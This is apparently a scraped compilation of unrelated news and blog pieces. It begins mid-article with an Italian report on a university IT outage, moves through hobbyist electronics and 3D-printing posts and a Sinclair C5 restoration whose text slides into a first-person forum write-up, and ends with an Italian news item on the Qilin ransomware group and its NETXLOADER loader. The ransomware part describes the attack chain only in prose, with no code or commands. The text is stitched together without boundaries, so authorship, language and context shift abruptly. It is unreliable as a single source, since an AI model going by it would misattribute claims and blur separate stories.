Tra questi, particolare attenzione è stata dedicata ai servizi di contabilità, protocollo informatico, Iris e segreteria studenti, fondamentali per la gestione amministrativa dell'Università. L’attività eseguita ha permesso, già dalla serata del 9, l’accesso a studenti e docenti ai servizi di segreteria (GOMP).
Ci scusiamo per il disagio, tutto il settore tecnico informatico è impegnato per il ripristino, seguiranno comunicazioni sui progressi nella riattivazione dei servizi.
La posta elettronica di Ateneo è funzionante, per poter accedere fare click qui ed inserire le credenziali tipo mrossi@os.uniroma3.it o mar.rossi@stud.uniroma3.it. Come nostra consuetudine, lasciamo spazio ad una dichiarazione dell’azienda qualora voglia darci degli aggiornamenti su questa vicenda e saremo lieti di pubblicarla con uno specifico articolo dando risalto alla questione.
RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono accedere utilizzare la mail crittografata del whistleblower.
3D printed in-place mechanisms and flexures, such as living hinges, are really neat when you can get them to print correctly. But how do you actually do that? YouTuber [Slant 3D] is here with a helpful video demonstrating the different kinds of springs and hinges (Video, embedded below) that can be printed reliably, and discusses some common pitfalls and areas to concentrate upon.
Living hinges are everywhere and have been used at least as long as humans have been around. The principle is simple enough; join two sections to move with a thinned section of material that, in small sections, is flexible enough to distort a few times without breaking off. The key section is “a few times”, as all materials will eventually fail due to overworking. However, if this thing is just a cheap plastic case around a low-cost product, that may not be a huge concern. The video shows a few ways to extend flexibility, such as spreading the bending load across multiple flexure elements to reduce the wear of individual parts, but that comes at the cost of compactness.
Moving on from springs, the second part of the video describes a few strategies for print-in-place hinges, describing how they fail, and what to do to mitigate. Again, robustness comes at a cost, in this case, increased bulk, but with 3D printing, you get what you pay for. Overall, it’s a nice, concise guide to the topic and well worth a mere seventeen minutes of your time, we reckon.
The RP2350 has a few advantages over its predecessor, one of which is the ability to load firmware remotely via UART, as [Thomas Pfilser] has documented on his blog and in the video below.
[Thomas] had a project that needed more PWM than the RP2350 could provide, and hit upon the idea of using a second RP2350 as a port expander. Now, one could hard-code this, but dealing with two sets of firmware on one board can be annoying. That’s where the UART bootloader comes in: it will allow [Thomas] to program the port-expander RP2350 using the main microcontroller. Thus he only has to worry about one firmware, speeding up development.
There are limits to this technique: for one, your code must fit into the RP2350’s RAM– but the chip has 512 kB. While 640 kB should be enough for anyone, 512 kB is plenty for the port-expander [Thomas] is working on. The second drawback is that your device now has a boot time of a second or so, since the UART connection is not exactly high-bandwidth. Third, using UART on the same pins as the bootloader within the program is a bit tricky, though [Thomas] found a solution that may soon be in the SDK.
[Thomas] also wanted to be able to perform this trick remotely, which isn’t exactly UART’s forte. RS-485 comes to the rescue, via TI’s THVD1450. That worked reliably at the 10m cable length used for the test. [Thomas] sees no reason it could not work over much longer distances. ([Thomas] suggests up to 100 m, but the baud rate is fairly low, so we wouldn’t be surprised if you could push it quite a bit further than that. The standard is good out to a kilometer, after all.) For all the wrinkles and links to tips and solutions, plus of course [Thomas]’s code, check out the blog. If you want to listen to the information, you can check out the video below.
Remember Video Volley? No? We don’t either. It looks like it was a very early video game console that could play tennis, hockey, or handball. In this video, [James] tears one apart. If you are like us, we are guessing there will be little more than one of those General Instrument video game chips inside.
These don’t look like they were mass-produced. The case looks like something off the shelf from those days. The whole thing looks more like a nice homebrew project or a pretty good prototype. Not like something you’d buy in a store.
Even inside, the wiring looks decidedly hand-built. The cheap phenolic PCB contained a surprise. The box does have a dedicated “pong” chip. But it isn’t from General Instruments! It’s a National Semiconductor chip instead.
The controllers are little more than sliding potentiometers in a box with a switch. We wonder how many of these were made and what they sold for new. If you know anything, let us know in the comments.
We still see the occasional project around a General Instruments chip. If you really want a challenge for a homebrew pong, ditch the pong chip and all the other ICs, too. If you want to read more about the history of the pong chip, you’ll probably enjoy this blog post from [pong-story].
This little audiobook player is a stellar example of the learning process behind a multifaceted project blending mechanical, electrical, and software design. [Mario] designed this audiobook player, dubbed Boxie, for his 3-year-old son to replace the often-used but flawed Toniebox.
The inspiration for Boxie was the Toniebox, a kid-friendly audiobook player. While functional, the Toniebox had drawbacks: it required internet connectivity, limited media selection, and had unreliable controls. Enter Boxie, a custom-built, standalone audiobook player free from web services, designed to address these issues with superior audio quality and toddler-friendly controls.
Boxie’s media is stored on microSD cards inserted into a slot on the device. To make this manageable for a toddler, he designed a PCB with a standard microSD card interface, ensuring easy swapping of audiobooks. The enclosure, crafted via 3D printing, is durable and compact, tailored for small hands.
The cartridges slide into the body of the Boxie. This presented a problem, most cartridge media utilize edge connectors. Strictly speaking, his DIY cartridges didn’t have those and couldn’t use traditional cartridge reader components. First trying pogo pins, he ran into several issues, most notably the inability to hold up to the wear and tear of a 3-year-old. A clever hack to add robustness was achieved when he switched to using a series of battery springs to interface with the cartridge.
Inside the Boxie lives an ESP32-S3 microcontroller, which provides the smarts to read all the controls, play audio from the inserted cartridge. The main housing also contains the battery, DAC, amp, and speaker. Mario faced a fair number of new challenges on this project, including designing a battery charging circuit and building his own ESP32-S3 board with support for charging NiMH batteries.
All of the 3D designs, PCB files, and source code are available on his GitHub account. If you’re interested in making a Boxie for a young one in your life, be sure to go check out his detailed write-up. If you enjoyed this project, be sure to check out the other DIY audio players we’ve featured.
The Thinkpad line of laptops, originally from IBM, and then from Lenovo, have long been the choice of many in our community. They offer a level of robustness and reliability missing in many cheaper machines. You may not be surprised to find that this article is being written on one. With such a following, it’s not surprising that a significant effort has gone into upgrading older models. For example, we have [Franck Deng]’s new motherboard for the Thinkpad X200 and X201. These models from the end of the 2000s shipped as far as we can remember with Core 2 Duo processors, so we can imagine they would be starting to feel their age.
It’s fair to say the new board isn’t a cheap option, but it does come with a new Core Ultra 7 CPU, DDR5 memory, M.2 interfaces for SSDs alongside the original 2.5″ device, and USB-C with Thunderbolt support. There are a range of screen upgrade options. For an even more hefty price, you can buy a completely rebuilt laptop featuring the new board. We’re impressed with the work, but we have to wonder how it would stack up against a newer Thinkpad for the price.
Microsoft’s latest Phi4 LLM has 14 billion parameters that require about 11 GB of storage. Can you run it on a Raspberry Pi? Get serious. However, the Phi4-mini-reasoning model is a cut-down version with “only” 3.8 billion parameters that requires 3.2 GB. That’s more realistic and, in a recent video, [Gary Explains] tells you how to add this LLM to your Raspberry Pi arsenal.
The version [Gary] uses has four-bit quantization and, as you might expect, the performance isn’t going to be stellar. If you are versed in all the LLM lingo, the quantization is the way weights are stored, and, in general, the more parameters a model uses, the more things it can figure out.
As a benchmark, [Gary] likes to use what he calls “the Alice question.” In other words, he asks for an answer to this question: “Alice has five brothers and she also has three sisters. How many sisters does Alice’s brother have?” While it probably took you a second to think about it, you almost certainly came up with the correct answer. With this model, a Raspberry Pi can answer it, too.
The first run seems fairly speedy, but it is running on a PC with a GPU. He notes that the same question takes about 10 minutes to pop up on a Raspberry Pi 5 with 4 cores and 8GB of RAM.
We aren’t sure what you’d do with a very slow LLM, but it does work. Let us know what you’d use it for, if anything, in the comments.
The Sinclair C5 was Sir Clive’s famous first venture into electric mobility, a recumbent electric-assisted tricycle which would have been hardly unusual in 2025. In 1985, though, the C5 was so far out there that it became a notorious failure. The C5 retains a huge following among enthusiasts, though, and among those is [JSON Alexander, who has bought one and restored it.
We’re treated to a teardown and frank examination of the vehicle’s strengths and weaknesses, during which we see the Sinclair brand unusually on a set of tyres, and the original motor, which is surprisingly more efficient than expected. Sir Clive may be gone, but this C5 will live again.
We’ve had the chance to road test a C5 in the past, and it’s fair to say that we can understand why such a low-down riding position was not a success back in the day. It’s unusual to see one in as original a condition as this one, it’s more usual to see a C5 that’s had a few upgrades.
Wow this got popular, I haven't really done a massive writeup like this since I was working on the PDP-11, and I forgot to finish that in the excitement that followed when I got it to boot, so now I feel obliged to continue.
Sadly I can't really do much active tests without the battery; I ordered one from Halfords for next day in store pickup, but that was on Friday, and still no word; for now it's just a standard 12v lead acid car battery just to make this thing go, but I at least for now know the control electronics are working from my rather flawed test with the power supply.
I'll take this time to talk a little more about the C5 and what I'm planning on doing with it. To start, I've had a couple of people repeat some misconceptions about the C5 and question why I am doing this.
The C5 uses a custom motor made by the Italian company Polymotor, who did make washing machine motors, and also torpedo motors; it very likely needed this custom motor as for the time, it's efficiency is incredible...
In 2022 I used to make a daily 10 mile (16km) round commute on a first generation Pure Air e-scooter, it could just about manage it doing 13mph (20km/h), coincidently, this is almost exactly the average performance and range of the C5 with it's original 80 AH lead acid battery, and yet the Pure Air is 40 years newer, weighs half as much and is absolutely packed full of lithium batteries!
If you had asked us yesterday “How do you 3D Print a Photo”, we would have said “well, that’s easy, do a lithopane”– but artist, hacker and man with a very relaxing voice [Wyatt Roy] has a much more impressive answer: Gaussian splats, rendered in resin.
Gaussian splats are a 3D scanning technique aimed at replicating a visual rather than geometry, like the mesh-based 3D-scanning we usually see on Hackaday. Using photogrammetry, a point cloud is generated with an associated 3D Gaussian function describing the colour at that point. Blend these together, and you can get some very impressive photorealistic 3D environments. Of course, printing a Gaussian smear of colour isn’t trivial, which is where the hacking comes in.
14-face isospheres do a good job of replicating the complicated Gaussian, as seen with this experimental long-exposure shot. [Wyatt] first generates the Gaussian splats with an app called Polycam, which outputs inscrutable binary .ply files. With AI assistance of dubious quality, [Wyatt] first created a python script to decompile this data into an ASCII file, which is then fed into a Rhino script to create geometry for printing. Rather than try and replicate the Gaussian splat at each point perfectly, which would melt his PC, [Wyatt] uses 14-face isospheres to approximate the 3D Gaussian functions. These then get further postprocessing to create a printable mesh.
Printing this isn’t going to be easy for most of us, because [Wyatt] is using a multi-color DLP resin printer. The main body is clear resin, and black or white resin used for the space defined by the isospheres created from the Gaussian Splat. When the interior color is white, the effect is quite similar to those acrylic cubes you sometimes see, where a laser has etched bubbles into their depths, which makes us wonder if that might be a more accessible way to use this technique.
If you’ve been designing parts for 3D printing, you probably have some tricks and standards for your designs. [Rahix] decided to write out a well-thought-out set of design rules for FDM prints, and we can all benefit.
One of the things we liked about the list is that it’s written in a way that explains everything. Every so often, there’s a box with a summarized rule for that topic. At the end, there’s a list of all the rules. The rules are also in categories, including part strength, tolerance, optimization, integration, machine elements, appearance, and vase mode.
For example, section two deals with tolerance and finish. So, rule R2.8 says, “Do not use circular holes for interference fits. Use hexagon or square holes instead.”
We also appreciate that [Rahix] touched on some of the counter-intuitive aspects of designing for FDM printing. For example, you might think adding voids in your part will reduce the filament and time required to print it, but in many cases it can have the opposite effect.
Some of these — maybe even most of these — won’t surprise you, but you still might take away a tidbit or two. But having it all down in a checklist and then the ability to scroll up and find the rationale for the rule is great.
Do you have any rules you’d add? Or change? Let us know. Meanwhile, we were eyeing our favorites about adding machine elements to prints.
Every time we end up talking about 3D printers, Al Williams starts off on how bad he is in a machine shop. I’m absolutely sure that he’s exaggerating, but the gist is that he’s much happier to work on stuff in CAD and let the machine take care of the precision and fine physical details. I’m like that too, but with me, it’s the artwork.
I can’t draw to save my life, but once I get it into digital form, I’m pretty good at manipulating images. And then I couldn’t copy that out into the real world, but that’s what the laser cutter is for, right? So the gameplan for this year’s Mother’s Day gift (reminder!) is three-way. I do the physical design, my son does the artwork, we combine them in FreeCAD and then hand it off to the machine. Everyone is playing to their strengths.
So why does it feel a little like cheating to just laser-cut out a present? I’m not honestly sure. My grandfather was a trained architectural draftsman before he let his artistic side run wild and went off to design jewellery. He could draw a nearly perfect circle with nothing more than a pencil, but he also used a French curve set, a pantograph, and a rolling architect’s ruler when they were called for. He had his tools too, and I bet he’d see the equivalence in mine.
People have used tools since the stone age, and the people who master their tools transcend them, and produce work where the “human” shines through despite having traced a curve or having passed the Gcode off to the cutter. If you doubt this, I’ll remind you of the technological feat that is the piano, with which people nonetheless produce music that doesn’t make you think of the hammers or of the tremendous cast metal frame. The tech disappears into the creation.
I’m sure there’s a parable here for our modern use of AI too, but I’ve got a Mother’s Day present to finish.
This article is part of the Hackaday.com newsletter, delivered every seven days for each of the last 200+ weeks. It also includes our favorite articles from the last seven days that you can see on the web version of the newsletter. Want this type of article to hit your inbox every Friday morning? You should sign up!
In the world of (expensive) lab test equipment the GPIB (general purpose interface bus) connection is hard to avoid if you want any kind of automation, but nobody likes wrangling with the bulky cables and compatibility issues when they can just use Ethernet instead. Here [Chris]’s Ethernet-GPIB adapter provides an easy solution, with both Power over Ethernet (PoE) and USB-C power options. Although commercial adapters already exist, these are rather pricey at ~$500.
Features of this adapter include a BOM total of <$50, with power provided either via PoE (802.3af) or USB-C (5V-only). The MCU is an ATmega4809 with the Ethernet side using a Wiznet W5500 SPI Ethernet controller. There is also a serial interface (provided by a CH340X USB-UART adapter), with the firmware based on the AR488 project.
The adapter supports both the VXI-11.2 and Prologix protocols, though not at the same time (due to ROM size limitations). All design documents are available via the GitHub repository, with the author also selling assembled adapters and providing support primarily via the EEVBlog forums.
Today we are happy to present a web-based GUI for making a web-based GUI! If you’re a programmer then web front-end development might not be your bag. But a web-based graphical user interface (GUI) for administration and reporting for your microcontroller device can look very professional and be super useful. The Mongoose Wizard can help you develop a device dashboard for your ESP32-based project.
In this article (and associated video) the Mongoose developers run you through how to get started with their technology. They help you get your development environment set up, create your dashboard layout, add a dashboard page, add a device settings page, add an over-the-air (OTA) firmware update page, build and test the firmware, and attach the user-interface controls to the hardware. The generated firmware includes an embedded web server for serving your dashboard and delivering its REST interface, pretty handy.
You will find no end of ESP32-based projects here at Hackaday which you could potentially integrate with Mongoose. We think the OTA support is an excellent feature to have, but of course there are other ways of supporting that functionality.
Il gruppo Qilin, da noi intervistato qualche tempo fa, è in cima alla lista degli operatori di ransomware più attivi nell’aprile 2025, pubblicando i dettagli di 72 vittime sul suo sito Data Leak Site (DLS). Secondo Group-IB si tratta di una cifra record: da luglio 2024 a gennaio 2025 il numero di tali pubblicazioni raramente superava le 23 al mese, ma da febbraio la curva ha registrato un forte aumento: 48 casi a febbraio, 44 a marzo e già 45 nelle prime settimane di aprile.
La causa principale dell’aumento dell’attività è stata la scomparsa improvvisa del gruppo concorrente RansomHub, che in precedenza si classificava al secondo posto per numero di attacchi. Dopo il crollo, un numero significativo di aggressori affiliati si è spostato a Qilin, causando una crescita esponenziale delle loro operazioni. Secondo Flashpoint, in un solo anno, da aprile 2024 ad aprile 2025, RansomHub è riuscito a colpire 38 organizzazioni del settore finanziario prima di scomparire dalla scena. La particolarità delle campagne Qilin è l’utilizzo di un nuovo pacchetto di componenti dannosi: il già noto modulo SmokeLoader e un nuovo loader .NET, nome in codice NETXLOADER.
I ricercatori di Trend Micro hanno studiato NETXLOADER in dettaglio e hanno notato il suo ruolo chiave nella distribuzione di malware. Questo downloader installa silenziosamente moduli dannosi, è protetto dall’analisi tramite .NET Reactor versione 6 e utilizza diverse tecniche di bypass.
NETXLOADER è estremamente difficile da analizzare: il codice è crittografato, i nomi dei metodi non sono informativi e la logica di esecuzione è confusa. Vengono utilizzate tecniche avanzate di occultamento, come gli hook JIT e il caricamento controllato delle DLL direttamente nella memoria, rendendo impossibile l’analisi statica o la ricerca di stringhe. Infatti, senza eseguirlo in un ambiente reale, è impossibile capire esattamente cosa fa questo bootloader.
Le catene di attacco iniziano molto spesso con il phishing o la compromissione di account reali, dopodiché NETXLOADER penetra nel sistema infetto. Successivamente, attiva SmokeLoader, che esegue controlli di anti-analisi, di virtualizzazione e disabilita i processi da un elenco predefinito. Nella fase finale, SmokeLoader contatta il server di controllo remoto e riceve da lì NETXLOADER, che carica già il ransomware Agenda utilizzando la tecnica Reflective DLL Loading, caricando la libreria direttamente nella memoria senza scriverla sul disco.
Agenda viene utilizzato attivamente per attaccare domini di rete, unità esterne, storage e hypervisor VCenter ESXi. Trend Micro ha osservato che le vittime più comuni sono le organizzazioni sanitarie, finanziarie, delle telecomunicazioni e delle infrastrutture IT in paesi come Stati Uniti, India, Brasile, Filippine e Paesi Bassi.
Con l’aumento del numero delle vittime e della maturità tecnica degli strumenti utilizzati, Qilin continua a consolidare la sua posizione come uno dei ransomware tecnologicamente più avanzati nel panorama della criminalità informatica.
